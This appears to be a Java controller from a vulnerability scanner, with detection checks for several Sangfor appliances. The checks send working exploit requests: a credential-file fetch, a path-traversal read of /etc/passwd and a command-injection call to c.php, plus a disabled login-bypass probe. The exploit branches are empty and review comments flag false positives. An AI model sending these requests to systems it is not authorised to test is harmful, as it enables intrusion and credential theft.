package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;

import java.net.MalformedURLException;

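/**
 * Detection checks for Sangfor (深信服) products.
 *
 * <p>Every check sends one GET request in {@code POC} mode and reports the outcome through
 * {@code WriteLog}. {@code EXP} mode is a no-op in all of them: no exploitation routine is
 * implemented in this class.
 *
 * <p>The checks match on plain substrings of the response body, so a positive result is an
 * indicator that should be confirmed manually before it is reported as a finding.
 */
@BasicMapping(uri = "深信服")
public class SangForController  extends Controller implements BasicController{

    /**
     * Checks whether the application delivery management system serves {@code sys_user.conf}
     * to an unauthenticated request.
     *
     * @param type   {@code POC} runs the check; {@code EXP} does nothing
     * @param target base URL of the system under test; the probe path is appended unchanged
     * @param args   unused
     * @throws MalformedURLException declared because of the {@code HttpRequest} constructor;
     *                               presumably raised for an unparsable target (confirm in HttpRequest)
     */
    @VulnerabilityDescriptionMapping(Description = "深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_sys_user信息泄露(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞");

        switch (type){
            case EXP:
                // Intentionally empty: only detection is implemented.
                break;
            case POC: {
                HttpRequest httpRequest = new HttpRequest(target+"/tmp/updateme/sinfor/ad/sys/sys_user.conf");
                Response result = httpRequest.Get("");
                // Status is tested first and the body is null-checked so that a failed or empty
                // response is reported as "not vulnerable" instead of raising a NullPointerException.
                // NOTE(review): "true" and "admin" are very common words; a custom error page
                // returned with status 200 can match, so treat a hit as unconfirmed.
                boolean exposed = result != null
                        && result.statusCode==200
                        && result.responseBody != null
                        && (result.responseBody.contains("true") || result.responseBody.contains("admin"));
                if(exposed){
                    WriteLog("\n[*] 存在漏洞");
                    // NOTE(review): the body is logged verbatim and, per the check description,
                    // may hold account credentials; handle the log as sensitive data.
                    WriteLog("\n[*]"+result.responseBody);
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                break;
            }
            default:
                break;
        }
    }

    /**
     * Checks whether {@code download.php} of the application delivery report system returns a
     * file outside its intended directory.
     *
     * @param type   {@code POC} runs the check; {@code EXP} does nothing
     * @param target base URL of the system under test; the probe path is appended unchanged
     * @param args   unused
     * @throws MalformedURLException declared because of the {@code HttpRequest} constructor;
     *                               presumably raised for an unparsable target (confirm in HttpRequest)
     */
    @VulnerabilityDescriptionMapping(Description = "深信服 应用交付报表系统 download.php 任意文件读取漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_download_文件读取(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  深信服 应用交付报表系统 download.php 任意文件读取漏洞");

        switch (type){
            case EXP:
                // Intentionally empty: only detection is implemented.
                break;
            case POC: {
                HttpRequest httpRequest = new HttpRequest(target+"/report/download.php?pdf=../../../../../etc/passwd");
                Response result = httpRequest.Get("");
                // Match the passwd entry prefix "root:" rather than the bare word "root", which
                // also appears in ordinary HTML and error pages and produced false positives.
                boolean exposed = result != null
                        && result.statusCode==200
                        && result.responseBody != null
                        && result.responseBody.contains("root:");
                if(exposed){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*]"+result.responseBody);
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                break;
            }
            default:
                break;
        }
    }

    /**
     * Checks whether {@code c.php} of the behaviour awareness system / log centre executes a
     * command passed in the query string.
     *
     * @param type   {@code POC} runs the check; {@code EXP} does nothing
     * @param target base URL of the system under test; the probe path is appended unchanged
     * @param args   unused
     * @throws MalformedURLException declared because of the {@code HttpRequest} constructor;
     *                               presumably raised for an unparsable target (confirm in HttpRequest)
     */
    @VulnerabilityDescriptionMapping(Description = "深信服 行为感知系统/日志中心 c.php 远程命令执行漏洞",SupportVulType = SupportVul.RuntimeExec)
    public void vul_c_命令执行(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  深信服 行为感知系统/日志中心 c.php 远程命令执行漏洞");

        switch (type){
            case EXP:
                // Intentionally empty: only detection is implemented.
                break;
            case POC: {
                // Built once so the request that is sent and the address that is logged cannot drift apart.
                String probeUrl = target+"/tool/log/c.php?strip_slashes=system&host=echo%20flag";
                HttpRequest httpRequest = new HttpRequest(probeUrl);
                Response result = httpRequest.Get("");
                // NOTE(review): the marker "flag" is also part of the request URL, so a page that
                // echoes the query string back matches without any command having run; confirm
                // a hit manually.
                boolean exposed = result != null
                        && result.statusCode==200
                        && result.responseBody != null
                        && result.responseBody.contains("flag");
                if(exposed){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*]请求地址："+probeUrl);
                    WriteLog("\n"+result.responseBody);
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                break;
            }
            default:
                break;
        }
    }

    // Disabled check, kept for reference only.
    // NOTE(review): as written it reports every HTTP 200 response as vulnerable, and the URL it
    // requests ("User=admin") differs in case from the URL it logs ("user=admin"). It also writes
    // to Cache.uiController.logTextArea directly instead of going through WriteLog. All three
    // points need resolving before it is re-enabled.
//    @VulnerabilityDescriptionMapping(Description = "深信服 终端检测检测平台 ui/login.php 任意用户登录漏洞",SupportVulType = SupportVul.信息泄露)
//    public void vul_loginBypass(Poc_Exp type, String target, Object... args) throws MalformedURLException {
//        Cache.uiController.logTextArea.appendText("\n[*]开始检测：  深信服 终端检测检测平台 ui/login.php 任意用户登录漏洞");
//
//        switch (type){
//            case EXP:
//                break;
//            case POC:
//                HttpRequest httpRequest = new HttpRequest(target+"/ui/login.php?User=admin");
//                Response result = httpRequest.Get("");
//                if(result.statusCode==200){
//                    WriteLog("\n[*] 存在漏洞");
//                    WriteLog("\n[*] 请求地址："+target+"/ui/login.php?user=admin");
//                }else {
//                    WriteLog("\n[*] 不存在漏洞");
//                }
//        }
//    }

}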
